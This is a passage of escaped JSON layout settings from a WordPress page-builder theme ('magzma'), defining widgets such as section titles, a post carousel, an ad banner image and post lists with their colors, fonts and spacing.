"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"1t1o7u3\",\"elType\":\"widget\",\"settings\":{\"section_magzma_carousel_post_5\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[\"6\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_carousel_post_5_layout\":\"\",\"use_shadow\":\"use\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2\":\"rgba(0,0,0,0.6)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#a66bbe\",\"bg_category_color\":\"#ffffff\",\"bg_hov_category_color\":\"#ffffff\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":16},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"category_font_weight\":\"600\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_carousel_post_5_control\":\"\",\"choose_column\":3,\"choose_column_mobile\":1,\"column_gap\":\"2\",\"width\":\"600\",\"height\":\"400\",\"navigation\":\"none\",\"navigation_arrows_color\":\"#000000\",\"navigation_dots_color\":\"#000000\",\"autoplay\":\"use\",\"autoplay_ms\":\"2500\",\"auto_loop\":\"use\",\"keyboard_nav\":\"\",\"centered_slide\":\"\",\"effect_type\":\"slide\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-carousel-slider-5\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"34.995\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"n74aj2y\",\"elType\":\"widget\",\"settings\":{\"section_magzma_advertising\":\"\",\"advertising_type\":\"image_and_url\",\"image\":{\"url\":\"http:\\/\\/demo7.magzma.com\\/wp-content\\/uploads\\/sites\\/8\\/2017\\/01\\/banner-380x250z.jpg\",\"id\":329},\"image_ad_size\":\"full\",\"link_to\":\"none\",\"link\":{\"is_external\":\"\",\"url\":\"\"},\"ad_script\":\"\",\"sticky_ads\":\"no\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-advertising-builder\"},{\"id\":\"6o4m5rj\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Game\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#e5e100\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"gqb8mcu\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"7\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-4\",\"section_magzma_post_list_4_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_4\":\"on\",\"post_icon_color1_post_list_4\":\"#61c436\",\"post_icon_color2_post_list_4\":\"#007AFE\",\"post_icon_size_post_list_4\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_4\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title_post_list_4\":\"on\",\"typhography_title_post_list_4_color\":\"#000000\",\"typhography_title_post_list_4_hov_color\":\"#aaaaaa\",\"post_list_4_title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_weight\":\"700\",\"post_list_4_title_font_weight_tablet\":\"400\",\"post_list_4_title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date_post_list_4\":\"on\",\"typhography_date_post_list_4_color\":\"#777777\",\"date_title_4_hov_color\":\"#777777\",\"post_list_4_date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list4_date_font_weight\":\"400\",\"post_list4_date_font_weight_tablet\":\"400\",\"post_list4_date_font_weight_mobile\":\"400\",\"section_magzma_post_list_4_column_control\":\"\",\"post_list4_margin_bottom\":\"\",\"horizontal_use_list_4\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_4\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-4\"},{\"id\":\"asc7q3k\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"3\",\"offset\":\"\",\"category\":[\"7\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2\":\"rgba(0,0,0,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\